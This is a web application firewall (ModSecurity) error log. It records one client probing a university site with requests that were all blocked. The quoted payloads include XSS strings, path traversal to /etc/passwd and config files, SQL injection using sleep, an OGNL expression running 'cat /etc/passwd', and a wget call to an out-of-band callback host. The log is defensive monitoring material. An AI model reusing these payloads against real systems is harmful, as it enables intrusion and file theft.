[Tue Aug 29 11:48:57.442713 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/tiki-5.2/tiki-edit_wiki_section.php"] [unique_id "ZO14ucCo-f0AAAfWN9MAAAAL"]
[Tue Aug 29 11:48:57.446054 2023] [:error] [pid 2379] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-content/themes/oxygen-theme/download.php"] [unique_id "ZO14ucCo-f0AAAlL7DcAAAAq"]
[Tue Aug 29 11:48:58.389318 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: \\x22><script>alert(31337)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/tiki-edit_wiki_section.php"] [unique_id "ZO14usCo-f0AAAlIBakAAAAn"]
[Tue Aug 29 11:48:59.443547 2023] [:error] [pid 2384] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:_variables. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:_variables: {\\x22_metadata\\x22:{\\x22classname\\x22:\\x22i/../lib/password.properties\\x22},\\x22_variables\\x22:[]}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc"] [unique_id "ZO14u8Co-f0AAAlQ3s8AAAAw"]
[Tue Aug 29 11:49:02.399717 2023] [:error] [pid 2310] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:sysCmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:sysCmd: wget http:/cjmnbitjmimt14dgn26gzjqn3huw4r8zp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/boafrm/formSysCmd"] [unique_id "ZO14vsCo-f0AAAkGCZ4AAAAE"]
[Tue Aug 29 11:49:04.455281 2023] [:error] [pid 2352] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /..././/..././/..././/..././/..././/..././/..././/..././ found within ARGS:filePath: wwwroot/..././/..././/..././/..././/..././/..././/..././/..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/admin/File/DownloadFile"] [unique_id "ZO14wMCo-f0AAAkwQUwAAAAS"]
[Tue Aug 29 11:49:05.432720 2023] [:error] [pid 2361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id_products[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:id_products[]: (select*from(select(sleep(6)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14wcCo-f0AAAk5ChAAAAAg"]
[Tue Aug 29 11:49:08.461779 2023] [:error] [pid 2344] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/siteminderagent/forms/smpwservices.fcc"] [unique_id "ZO14xMCo-f0AAAkoTnAAAAAH"]
[Tue Aug 29 11:49:09.388774 2023] [:error] [pid 2442] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:USERNAME: <img src=x onerror=\\x22confirm(document.domain)\\x22>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "mbkm.unla.ac.id"] [uri "/siteminderagent/forms/smaceauth.fcc"] [unique_id "ZO14xcCo-f0AAAmKK@wAAAAI"]
[Tue Aug 29 11:49:10.393245 2023] [:error] [pid 2442] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22:{\\x22 found within ARGS:query: {\\x22tax_query\\x22:{\\x220\\x22:{\\x22field\\x22:\\x22term_taxonomy_id\\x22,\\x22terms\\x22:[\\x22\\x22]}}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO14xsCo-f0AAAmKK@8AAAAI"]
[Tue Aug 29 11:49:15.398920 2023] [:error] [pid 2442] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:id: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mbkm.unla.ac.id"] [uri "/eam/vib"] [unique_id "ZO14y8Co-f0AAAmKK-UAAAAI"]
[Tue Aug 29 11:51:05.394249 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:type: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/cliniccases/lib/php/data/messages_load.php"] [unique_id "ZO15OcCo-f0AAAlIBd8AAAAn"]
[Tue Aug 29 11:51:05.532204 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:expression. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22) ,# found within ARGS:expression: (#_memberAccess[\\x22allowStaticMethodAccess\\x22]=true,#foo=new java.lang.Boolean(\\x22false\\x22) ,#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream()))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/devmode.action"] [unique_id "ZO15OcCo-f0AAAlIBeUAAAAn"]
[Tue Aug 29 11:51:05.691157 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[newpassword1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[newpassword1]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15OcCo-f0AAAfWOBwAAAAL"]
[Tue Aug 29 11:51:05.797739 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:username: <img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/cas/v1/tickets/"] [unique_id "ZO15OcCo-f0AAAlIBe4AAAAn"]
[Tue Aug 29 11:51:06.194960 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/exchweb/bin/redir.asp"] [unique_id "ZO15OsCo-f0AAAlIBf8AAAAn"]
[Tue Aug 29 11:51:06.287161 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15OsCo-f0AAAhoHPAAAAAl"]
[Tue Aug 29 11:51:08.571502 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:log: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO15PMCo-f0AAAm5BvcAAAAA"]
[Tue Aug 29 11:51:08.669044 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:errors[fu-disallowed-mime-type][0][name]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:errors[fu-disallowed-mime-type][0][name]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/"] [unique_id "ZO15PMCo-f0AAAfWOCsAAAAL"]
[Tue Aug 29 11:51:09.552967 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:settingsform[firstname]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:settingsform[firstname]: pdteam' onclick='alert(document.domain)"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/install.php"] [unique_id "ZO15PcCo-f0AAAmHd88AAAAz"]
[Tue Aug 29 11:51:09.579706 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:country. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:country: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15PcCo-f0AAAnDFx4AAAAM"]
[Tue Aug 29 11:51:10.948011 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/tools/sourceViewer/index.html"] [unique_id "ZO15PsCo-f0AAAmNp2AAAAAQ"]
[Tue Aug 29 11:51:11.544353 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:category. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:category: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15P8Co-f0AAAmOBcUAAAAU"]
[Tue Aug 29 11:51:12.848764 2023] [:error] [pid 2446] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15QMCo-f0AAAmOBcwAAAAU"]
[Tue Aug 29 11:51:13.586862 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dflink. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:dflink: ../../../configuration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAjdQTEAAAAZ"]
[Tue Aug 29 11:51:13.620203 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15QcCo-f0AAAfWODcAAAAL"]
[Tue Aug 29 11:51:13.721035 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QcCo-f0AAAm@5wQAAAAH"]
[Tue Aug 29 11:51:14.689410 2023] [:error] [pid 2424] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "mbkm.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15QsCo-f0AAAl4sXcAAAAf"]
[Tue Aug 29 11:51:15.663589 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAfWODoAAAAL"]
[Tue Aug 29 11:51:15.872331 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "mbkm.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15Q8Co-f0AAAnCKyoAAAAK"]
